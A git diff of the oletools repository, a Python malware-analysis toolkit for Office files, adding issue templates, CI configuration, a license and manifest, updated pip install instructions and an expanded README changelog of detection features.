diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md new file mode 100644 index 00000000..06c790b7 --- /dev/null +++ b/.github/ISSUE_TEMPLATE/bug_report.md @@ -0,0 +1,33 @@ +--- +name: Bug report +about: Create a bug report to help us fix issues + +--- + +**Affected tool:** +olevba, mraptor, rtfobj, oleid, etc + +**Describe the bug** +A clear and concise description of what the bug is. + +**File/Malware sample to reproduce the bug** +Please attach the file in a password protected zip archive, or provide a link where it can be downloaded (e.g. Hybrid Analysis, preferably not VirusTotal which requires paid access). If not possible, please provide a hash. + +**How To Reproduce the bug** +Steps to reproduce the behavior, including the full command line or the options you used. + +**Expected behavior** +A clear and concise description of what you expected to happen. + +**Console output / Screenshots** +If applicable, add screenshots to help explain your problem. +Use the option "-l debug" to add debugging information, if possible. + +**Version information:** + - OS: Windows/Linux/Mac/Other + - OS version: x.xx - 32/64 bits + - Python version: 2.7/3.6 - 32/64 bits + - oletools version: + +**Additional context** +Add any other context about the problem here. diff --git a/.github/ISSUE_TEMPLATE/feature_request.md b/.github/ISSUE_TEMPLATE/feature_request.md new file mode 100644 index 00000000..066b2d92 --- /dev/null +++ b/.github/ISSUE_TEMPLATE/feature_request.md @@ -0,0 +1,17 @@ +--- +name: Feature request +about: Suggest an idea for this project + +--- + +**Is your feature request related to a problem? Please describe.** +A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] + +**Describe the solution you'd like** +A clear and concise description of what you want to happen. 
+ +**Describe alternatives you've considered** +A clear and concise description of any alternative solutions or features you've considered. + +**Additional context** +Add any other context or screenshots about the feature request here. diff --git a/.gitignore b/.gitignore index edd1b098..174bad8c 100644 --- a/.gitignore +++ b/.gitignore @@ -56,7 +56,7 @@ coverage.xml # Translations *.mo -*.pot +#*.pot # Django stuff: *.log diff --git a/.travis.yml b/.travis.yml index b3e3ee09..685e5a9c 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,7 +1,19 @@ language: python - -python: - - "2.7" cache: pip +sudo: false + +matrix: + include: + - python: 2.7 + - python: 3.5 + - python: 3.6 + - python: 3.7 + - python: 3.8 + - python: pypy + - python: pypy3 + +install: + - pip install msoffcrypto-tool + script: - python setup.py test diff --git a/INSTALL.txt b/INSTALL.txt index 62e4a4ef..f1b4a464 100644 --- a/INSTALL.txt +++ b/INSTALL.txt @@ -1,16 +1,12 @@ -How to Download and Install python-oletools -=========================================== +How to Download and Install oletools +==================================== Pre-requisites -------------- -The recommended Python version to run oletools is Python 2.7. -Python 2.6 is also supported, but as it is not tested as often as 2.7, some features -might not work as expected. - -Since v0.50, oletools can also run with Python 3.x. As this is quite new, please -report any issue you may encounter. - +The recommended Python version to run oletools is the latest **Python 3.x** (3.7 for now). +Python 2.7 is still supported, but as it will reach end of life in 2020 (see https://pythonclock.org/), it is highly +recommended to switch to Python 3 now. 
Recommended way to Download+Install/Update oletools: pip -------------------------------------------------------- @@ -23,7 +19,11 @@ system, either upgrade Python or see https://pip.pypa.io/en/stable/installing/ To download and install/update the latest release version of oletools, run the following command in a shell: +```text sudo -H pip install -U oletools +``` + +Replace `pip` by `pip3` or `pip2` to install on a specific Python version. **Important**: Since version 0.50, pip will automatically create convenient command-line scripts in /usr/local/bin to run all the oletools from any directory. @@ -33,7 +33,19 @@ in /usr/local/bin to run all the oletools from any directory. To download and install/update the latest release version of oletools, run the following command in a cmd window: +```text pip install -U oletools +``` + +Replace `pip` by `pip3` or `pip2` to install on a specific Python version. + +**Note**: with Python 3, you may need to open a cmd window with Administrator privileges in order to run pip +and install for all users. If that is not possible, you may also install only for the current user +by adding the `--user` option: + +```text +pip3 install -U --user oletools +``` **Important**: Since version 0.50, pip will automatically create convenient command-line scripts to run all the oletools from any directory: olevba, mraptor, oleid, rtfobj, etc. @@ -47,18 +59,33 @@ you may also use pip: ### Linux, Mac OSX, Unix +```text sudo -H pip install -U https://github.com/decalage2/oletools/archive/master.zip +``` + +Replace `pip` by `pip3` or `pip2` to install on a specific Python version. ### Windows +```text pip install -U https://github.com/decalage2/oletools/archive/master.zip +``` + +Replace `pip` by `pip3` or `pip2` to install on a specific Python version. + +**Note**: with Python 3, you may need to open a cmd window with Administrator privileges in order to run pip +and install for all users. 
If that is not possible, you may also install only for the current user +by adding the `--user` option: +```text +pip3 install -U --user https://github.com/decalage2/oletools/archive/master.zip +``` How to install offline - Computer without Internet access --------------------------------------------------------- First, download the oletools archive on a computer with Internet access: -* Latest stable version: from https://github.com/decalage2/oletools/releases +* Latest stable version: from https://pypi.org/project/oletools/ or https://github.com/decalage2/oletools/releases * Development version: https://github.com/decalage2/oletools/archive/master.zip Copy the archive file to the target computer. @@ -66,11 +93,15 @@ Copy the archive file to the target computer. On Linux, Mac OSX, Unix, run the following command using the filename of the archive that you downloaded: +```text sudo -H pip install -U oletools.zip +``` On Windows: +```text pip install -U oletools.zip +``` Old school install using setup.py @@ -88,9 +119,12 @@ Then extract the archive, open a shell and go to the oletools directory. ### Linux, Mac OSX, Unix +```text sudo -H python setup.py install +``` ### Windows: +```text python setup.py install - +``` diff --git a/LICENSE.md b/LICENSE.md new file mode 100644 index 00000000..896a57a7 --- /dev/null +++ b/LICENSE.md @@ -0,0 +1,52 @@ +This license applies to the python-oletools package, apart from the thirdparty folder which contains third-party files +published with their own license. + +The python-oletools package is copyright (c) 2012-2019 Philippe Lagadec (http://www.decalage.info) + +All rights reserved. + +Redistribution and use in source and binary forms, with or without modification, +are permitted provided that the following conditions are met: + + * Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. 
+ * Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + + +---------- + +olevba contains modified source code from the officeparser project, published +under the following MIT License (MIT): + +officeparser is copyright (c) 2014 John William Davison + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/MANIFEST.in b/MANIFEST.in new file mode 100644 index 00000000..b08e1e6c --- /dev/null +++ b/MANIFEST.in @@ -0,0 +1,14 @@ +include install.bat +include INSTALL.txt +include README.md +include requirements.txt +include oletools/README.rst +include oletools/README.html +include oletools/LICENSE.txt +include oletools/DocVarDump.vba +recursive-include oletools/thirdparty *.* +recursive-include cheatsheet *.* +global-exclude *.pyc + +recursive-include tests *.py +graft tests/test-data diff --git a/README.md b/README.md index 7f3664c8..8e3e4746 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,8 @@ python-oletools =============== -[![PyPI](https://img.shields.io/pypi/v/oletools.svg)](https://pypi.python.org/pypi/oletools) +[![PyPI](https://img.shields.io/pypi/v/oletools.svg)](https://pypi.org/project/oletools/) [![Build Status](https://travis-ci.org/decalage2/oletools.svg?branch=master)](https://travis-ci.org/decalage2/oletools) +[![Say Thanks!](https://img.shields.io/badge/Say%20Thanks-!-1EAEDB.svg)](https://saythanks.io/to/decalage2) [oletools](http://www.decalage.info/python/oletools) is a package of python tools to analyze [Microsoft OLE2 files](http://en.wikipedia.org/wiki/Compound_File_Binary_Format) @@ -18,71 +19,127 @@ See [http://www.decalage.info/python/oletools](http://www.decalage.info/python/o [Contact the Author](http://decalage.info/contact) - [Repository](https://github.com/decalage2/oletools) - [Updates on Twitter](https://twitter.com/decalage2) +[Cheatsheet](https://github.com/decalage2/oletools/blob/master/cheatsheet/oletools_cheatsheet.pdf) Note: python-oletools is not related to OLETools published by BeCubed Software. 
News ---- -- **2017-06-29 v0.51**: - - added the [oletools cheatsheet](https://github.com/decalage2/oletools/blob/master/cheatsheet/oletools_cheatsheet.pdf) - - improved [rtfobj](https://github.com/decalage2/oletools/wiki/rtfobj) to handle malformed RTF files, detect vulnerability CVE-2017-0199 - - olevba: improved deobfuscation and Mac files support - - [mraptor](https://github.com/decalage2/oletools/wiki/mraptor): added more ActiveX macro triggers - - added [DocVarDump.vba](https://github.com/decalage2/oletools/blob/master/oletools/DocVarDump.vba) to dump document variables using Word - - olemap: can now detect and extract [extra data at end of file](http://decalage.info/en/ole_extradata), improved display - - oledir, olemeta, oletimes: added support for zip files and wildcards - - many [bugfixes](https://github.com/decalage2/oletools/milestone/3?closed=1) in all the tools - - improved Python 2+3 support -- 2016-11-01 v0.50: all oletools now support python 2 and 3. - - olevba: several bugfixes and improvements. - - mraptor: improved detection, added mraptor_milter for Sendmail/Postfix integration. - - rtfobj: brand new RTF parser, obfuscation-aware, improved display, detect - executable files in OLE Package objects. - - setup: now creates handy command-line scripts to run oletools from any directory. -- 2016-06-10 v0.47: [olevba](https://github.com/decalage2/oletools/wiki/olevba) added PPT97 macros support, -improved handling of malformed/incomplete documents, improved error handling and JSON output, -now returns an exit code based on analysis results, new --relaxed option. -[rtfobj](https://github.com/decalage2/oletools/wiki/rtfobj): improved parsing to handle obfuscated RTF documents, -added -d option to set output dir. Moved repository and documentation to GitHub. 
+- **2019-12-03 v0.55**: + - olevba: + - added support for SLK files and XLM macro extraction from SLK + - VBA Stomping detection + - integrated pcodedmp to extract and disassemble P-code + - detection of suspicious keywords and IOCs in P-code + - new option --pcode to display P-code disassembly + - improved detection of auto execution triggers + - rtfobj: added URL carver for CVE-2017-0199 + - better handling of unicode for systems with a locale that does not support UTF-8, e.g. LANG=C (PR #365) + - tests: + - test files can now be encrypted, to avoid antivirus alerts (PR #217, issue #215) + - tests that trigger antivirus alerts have been temporarily disabled (issue #215) +- **2019-05-22 v0.54.2**: + - bugfix release: fixed several issues related to encrypted documents + and XLM/XLF Excel 4 macros + - msoffcrypto-tool is now installed by default to handle encrypted documents + - olevba and msodde now handle documents encrypted with common passwords such + as 123, 1234, 4321, 12345, 123456, VelvetSweatShop automatically. 
+- **2019-04-04 v0.54**: + - olevba, msodde: added support for encrypted MS Office files + - olevba: added detection and extraction of XLM/XLF Excel 4 macros (thanks to plugin_biff from Didier Stevens' oledump) + - olevba, mraptor: added detection of VBA running Excel 4 macros + - olevba: detect and display special characters such as backspace + - olevba: colorized output showing suspicious keywords in the VBA code + - olevba, mraptor: full Python 3 compatibility, no separate olevba3/mraptor3 anymore + - olevba: improved handling of code pages and unicode + - olevba: fixed a false-positive in VBA macro detection + - rtfobj: improved OLE Package handling, improved Equation object detection + - oleobj: added detection of external links to objects in OpenXML + - replaced third party packages by PyPI dependencies +- 2018-05-30 v0.53: + - olevba and mraptor can now parse Word/PowerPoint 2007+ pure XML files (aka Flat OPC format) + - improved support for VBA forms in olevba (oleform) + - rtfobj now displays the CLSID of OLE objects, which is the best way to identify them. Known-bad CLSIDs such as MS Equation Editor are highlighted in red. + - Updated rtfobj to handle obfuscated RTF samples. + - rtfobj now handles the "\\'" obfuscation trick seen in recent samples such as https://twitter.com/buffaloverflow/status/989798880295444480, by emulating the MS Word bug described in https://securelist.com/disappearing-bytes/84017/ + - msodde: improved detection of DDE formulas in CSV files + - oledir now displays the tree of storage/streams, along with CLSIDs and their meaning. + - common.clsid contains the list of known CLSIDs, and their links to CVE vulnerabilities when relevant. + - oleid now detects encrypted OpenXML files + - fixed bugs in oleobj, rtfobj, oleid, olevba See the [full changelog](https://github.com/decalage2/oletools/wiki/Changelog) for more information. 
Tools: ------ -- [olebrowse](https://github.com/decalage2/oletools/wiki/olebrowse): A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to - view and extract individual data streams. +### Tools to analyze malicious documents + - [oleid](https://github.com/decalage2/oletools/wiki/oleid): to analyze OLE files to detect specific characteristics usually found in malicious files. -- [olemeta](https://github.com/decalage2/oletools/wiki/olemeta): to extract all standard properties (metadata) from OLE files. -- [oletimes](https://github.com/decalage2/oletools/wiki/oletimes): to extract creation and modification timestamps of all streams and storages. -- [oledir](https://github.com/decalage2/oletools/wiki/oledir): to display all the directory entries of an OLE file, including free and orphaned entries. -- [olemap](https://github.com/decalage2/oletools/wiki/olemap): to display a map of all the sectors in an OLE file. - [olevba](https://github.com/decalage2/oletools/wiki/olevba): to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML). - [MacroRaptor](https://github.com/decalage2/oletools/wiki/mraptor): to detect malicious VBA Macros +- [msodde](https://github.com/decalage2/oletools/wiki/msodde): to detect and extract DDE/DDEAUTO links from MS Office documents, RTF and CSV - [pyxswf](https://github.com/decalage2/oletools/wiki/pyxswf): to detect, extract and analyze Flash objects (SWF) that may be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF, which is especially useful for malware analysis. - [oleobj](https://github.com/decalage2/oletools/wiki/oleobj): to extract embedded objects from OLE files. - [rtfobj](https://github.com/decalage2/oletools/wiki/rtfobj): to extract embedded objects from RTF files. -- and a few others (coming soon) + +### Tools to analyze the structure of OLE files + +- [olebrowse](https://github.com/decalage2/oletools/wiki/olebrowse): A simple GUI to browse OLE files (e.g. 
MS Word, Excel, Powerpoint documents), to + view and extract individual data streams. +- [olemeta](https://github.com/decalage2/oletools/wiki/olemeta): to extract all standard properties (metadata) from OLE files. +- [oletimes](https://github.com/decalage2/oletools/wiki/oletimes): to extract creation and modification timestamps of all streams and storages. +- [oledir](https://github.com/decalage2/oletools/wiki/oledir): to display all the directory entries of an OLE file, including free and orphaned entries. +- [olemap](https://github.com/decalage2/oletools/wiki/olemap): to display a map of all the sectors in an OLE file. + Projects using oletools: ------------------------ oletools are used by a number of projects and online malware analysis services, -including [Viper](http://viper.li/), [REMnux](https://remnux.org/), +including +[ACE](https://github.com/IntegralDefense/ACE), +[Anlyz.io](https://sandbox.anlyz.io/), +[AssemblyLine](https://www.cse-cst.gc.ca/en/assemblyline), +[CAPE](https://github.com/ctxis/CAPE), +[CinCan](https://cincan.io), +[Cuckoo Sandbox](https://github.com/cuckoosandbox/cuckoo), +[DARKSURGEON](https://github.com/cryps1s/DARKSURGEON), +[Deepviz](https://sandbox.deepviz.com/), +[dridex.malwareconfig.com](https://dridex.malwareconfig.com), +[EML Analyzer](https://github.com/ninoseki/eml_analyzer), [FAME](https://certsocietegenerale.github.io/fame/), +[FLARE-VM](https://github.com/fireeye/flare-vm), [Hybrid-analysis.com](https://www.hybrid-analysis.com/), +[IntelOwl](https://github.com/certego/IntelOwl), [Joe Sandbox](https://www.document-analyzer.net/), -[Deepviz](https://sandbox.deepviz.com/), [Laika BOSS](https://github.com/lmco/laikaboss), -[Cuckoo Sandbox](https://github.com/cuckoosandbox/cuckoo), -[Anlyz.io](https://sandbox.anlyz.io/), -[ViperMonkey](https://github.com/decalage2/ViperMonkey), +[MacroMilter](https://github.com/sbidy/MacroMilter), +[mailcow](https://mailcow.email/), +[malshare.io](https://malshare.io), 
+[malware-repo](https://github.com/Tigzy/malware-repo), +[Malware Repository Framework (MRF)](https://www.adlice.com/download/mrf/), +[olefy](https://github.com/HeinleinSupport/olefy), +[PeekabooAV](https://github.com/scVENUS/PeekabooAV), [pcodedmp](https://github.com/bontchev/pcodedmp), -[dridex.malwareconfig.com](https://dridex.malwareconfig.com), -and probably [VirusTotal](https://www.virustotal.com). +[PyCIRCLean](https://github.com/CIRCL/PyCIRCLean), +[REMnux](https://remnux.org/), +[Snake](https://github.com/countercept/snake), +[SNDBOX](https://app.sndbox.com), +[SpuriousEmu](https://github.com/ldbo/SpuriousEmu), +[Strelka](https://github.com/target/strelka), +[stoQ](https://stoq.punchcyber.com/), +[TheHive/Cortex](https://github.com/TheHive-Project/Cortex-Analyzers), +[TSUGURI Linux](https://tsurugi-linux.org/), +[Vba2Graph](https://github.com/MalwareCantFly/Vba2Graph), +[Viper](http://viper.li/), +[ViperMonkey](https://github.com/decalage2/ViperMonkey), +[YOMI](https://yomi.yoroi.company), +and probably [VirusTotal](https://www.virustotal.com). +And quite a few [other projects on GitHub](https://github.com/search?q=oletools&type=Repositories). (Please [contact me](http://decalage.info/contact) if you have or know a project using oletools) @@ -135,7 +192,7 @@ License This license applies to the python-oletools package, apart from the thirdparty folder which contains third-party files published with their own license. -The python-oletools package is copyright (c) 2012-2017 Philippe Lagadec (http://www.decalage.info) +The python-oletools package is copyright (c) 2012-2019 Philippe Lagadec (http://www.decalage.info) All rights reserved. diff --git a/README.rst b/README.rst new file mode 100644 index 00000000..db55e5fd --- /dev/null +++ b/README.rst @@ -0,0 +1 @@ +Needed for setup.py diff --git a/doc/empty_file.txt b/doc/empty_file.txt new file mode 100644 index 00000000..944c593a --- /dev/null +++ b/doc/empty_file.txt @@ -0,0 +1 @@ +Nothing to see here. 
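As background for the README changes above: all the OLE2 analysis tools (oleid, oledir, olemap, olevba, etc.) operate on the Compound File Binary Format, which begins with a fixed 8-byte signature. A minimal pre-screening check, sketched here independently of oletools (the function name `looks_like_ole2` is purely illustrative; the magic bytes are from the published CFBF format), could look like:

```python
# Minimal pre-screen for OLE2/CFBF files, e.g. before handing a sample to a
# dedicated parser. Sketch only: the real oletools also accept OpenXML (zip)
# and RTF inputs, which do not start with this signature.

OLE2_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"  # CFBF header signature

def looks_like_ole2(path):
    """Return True if the file starts with the OLE2/CFBF magic bytes."""
    with open(path, "rb") as f:
        # A file shorter than 8 bytes yields a shorter read and compares False.
        return f.read(len(OLE2_MAGIC)) == OLE2_MAGIC
```

Files in the newer OpenXML formats (.docx, .xlsm, ...) are zip archives starting with `PK` instead, which is why the tools identify the container type before parsing.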
diff --git a/oletools/LICENSE.txt b/oletools/LICENSE.txt index 5651e936..4a964f86 100644 --- a/oletools/LICENSE.txt +++ b/oletools/LICENSE.txt @@ -1,54 +1,54 @@ -LICENSE for the python-oletools package: - -This license applies to the python-oletools package, apart from the thirdparty -folder which contains third-party files published with their own license. - -The python-oletools package is copyright (c) 2012-2017 Philippe Lagadec (http://www.decalage.info) - -All rights reserved. - -Redistribution and use in source and binary forms, with or without modification, -are permitted provided that the following conditions are met: - - * Redistributions of source code must retain the above copyright notice, this - list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above copyright notice, - this list of conditions and the following disclaimer in the documentation - and/or other materials provided with the distribution. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE -FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL -DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER -CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, -OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
- - ----------- - -olevba contains modified source code from the officeparser project, published -under the following MIT License (MIT): - -officeparser is copyright (c) 2014 John William Davison - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. +LICENSE for the python-oletools package: + +This license applies to the python-oletools package, apart from the thirdparty +folder which contains third-party files published with their own license. + +The python-oletools package is copyright (c) 2012-2019 Philippe Lagadec (http://www.decalage.info) + +All rights reserved. + +Redistribution and use in source and binary forms, with or without modification, +are permitted provided that the following conditions are met: + + * Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. 
+ * Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + + +---------- + +olevba contains modified source code from the officeparser project, published +under the following MIT License (MIT): + +officeparser is copyright (c) 2014 John William Davison + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/oletools/README.html b/oletools/README.html index 5a3199ec..cff9e81f 100644 --- a/oletools/README.html +++ b/oletools/README.html @@ -1,58 +1,103 @@ - - + +
- - + -oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the olefile parser. See http://www.decalage.info/python/oletools for more info.
-Quick links: Home page - Download/Install - Documentation - Report Issues/Suggestions/Questions - Contact the Author - Repository - Updates on Twitter
+Quick links: Home page - Download/Install - Documentation - Report Issues/Suggestions/Questions - Contact the Author - Repository - Updates on Twitter - Cheatsheet
Note: python-oletools is not related to OLETools published by BeCubed Software.
See the full changelog for more information.
oletools are used by a number of projects and online malware analysis services, including Viper, REMnux, FAME, Hybrid-analysis.com, Joe Sandbox, Deepviz, Laika BOSS, Cuckoo Sandbox, Anlyz.io, ViperMonkey, pcodedmp, dridex.malwareconfig.com, and probably VirusTotal. (Please contact me if you have or know a project using oletools)
+oletools are used by a number of projects and online malware analysis services, including ACE, Anlyz.io, AssemblyLine, CAPE, Cuckoo Sandbox, DARKSURGEON, Deepviz, dridex.malwareconfig.com, FAME, FLARE-VM, Hybrid-analysis.com, Joe Sandbox, Laika BOSS, MacroMilter, mailcow, malshare.io, malware-repo, Malware Repository Framework (MRF), olefy, PeekabooAV, pcodedmp, PyCIRCLean, REMnux, Snake, SNDBOX, Strelka, stoQ, TheHive/Cortex, TSUGURI Linux, Vba2Graph, Viper, ViperMonkey, YOMI, and probably VirusTotal. And quite a few other projects on GitHub. (Please contact me if you have or know a project using oletools)
The recommended way to download and install/update the latest stable release of oletools is to use pip:
The code is available in a GitHub repository. You may use it to submit enhancements using forks and pull requests.
This license applies to the python-oletools package, apart from the thirdparty folder which contains third-party files published with their own license.
-The python-oletools package is copyright (c) 2012-2017 Philippe Lagadec (http://www.decalage.info)
+The python-oletools package is copyright (c) 2012-2019 Philippe Lagadec (http://www.decalage.info)
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
This is the home page of the documentation for python-oletools. The latest version can be found online, otherwise a copy is provided in the doc subfolder of the package.
python-oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the olefile parser. See http://www.decalage.info/python/oletools for more info.
Quick links: Home page - Download/Install - Documentation - Report Issues/Suggestions/Questions - Contact the Author - Repository - Updates on Twitter
Note: python-oletools is not related to OLETools published by BeCubed Software.
The recommended Python version to run oletools is Python 2.7. Python 2.6 is also supported, but as it is not tested as often as 2.7, some features might not work as expected.
-Since oletools v0.50, thanks to contributions by [@Sebdraven](https://twitter.com/Sebdraven), most tools can also run with Python 3.x. As this is quite new, please report any issue you may encounter.
+The recommended Python version to run oletools is the latest Python 3.x (3.7 for now). Python 2.7 is still supported, but as it will reach end of life in 2020 (see https://pythonclock.org/), it is highly recommended to switch to Python 3 now.
Pip is included with Python since version 2.7.9 and 3.4. If it is not installed on your system, either upgrade Python or see https://pip.pypa.io/en/stable/installing/
To download and install/update the latest release version of oletools, run the following command in a shell:
sudo -H pip install -U oletools
+Replace pip by pip3 or pip2 to install on a specific Python version.
Important: Since version 0.50, pip will automatically create convenient command-line scripts in /usr/local/bin to run all the oletools from any directory.
To download and install/update the latest release version of oletools, run the following command in a cmd window:
pip install -U oletools
+Replace pip by pip3 or pip2 to install on a specific Python version.
Note: with Python 3, you may need to open a cmd window with Administrator privileges in order to run pip and install for all users. If that is not possible, you may also install only for the current user by adding the --user option:
pip3 install -U --user oletools
Important: Since version 0.50, pip will automatically create convenient command-line scripts to run all the oletools from any directory: olevba, mraptor, oleid, rtfobj, etc.
If you want to benefit from the latest improvements in the development version, you may also use pip:
sudo -H pip install -U https://github.com/decalage2/oletools/archive/master.zip
+Replace pip by pip3 or pip2 to install on a specific Python version.
pip install -U https://github.com/decalage2/oletools/archive/master.zip
+Replace pip by pip3 or pip2 to install on a specific Python version.
Note: with Python 3, you may need to open a cmd window with Administrator privileges in order to run pip and install for all users. If that is not possible, you may also install only for the current user by adding the --user option:
pip3 install -U --user https://github.com/decalage2/oletools/archive/master.zip
First, download the oletools archive on a computer with Internet access: * Latest stable version: from https://github.com/decalage2/oletools/releases * Development version: https://github.com/decalage2/oletools/archive/master.zip
+First, download the oletools archive on a computer with Internet access: * Latest stable version: from https://pypi.org/project/oletools/ or https://github.com/decalage2/oletools/releases * Development version: https://github.com/decalage2/oletools/archive/master.zip
Copy the archive file to the target computer.
On Linux, Mac OSX, Unix, run the following command using the filename of the archive that you downloaded:
sudo -H pip install -U oletools.zip
@@ -52,16 +67,17 @@ This license applies to the python-oletools package, apart from the thirdparty folder which contains third-party files published with their own license.
-The python-oletools package is copyright (c) 2012-2017 Philippe Lagadec (http://www.decalage.info)
+The python-oletools package is copyright (c) 2012-2019 Philippe Lagadec (http://www.decalage.info)
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
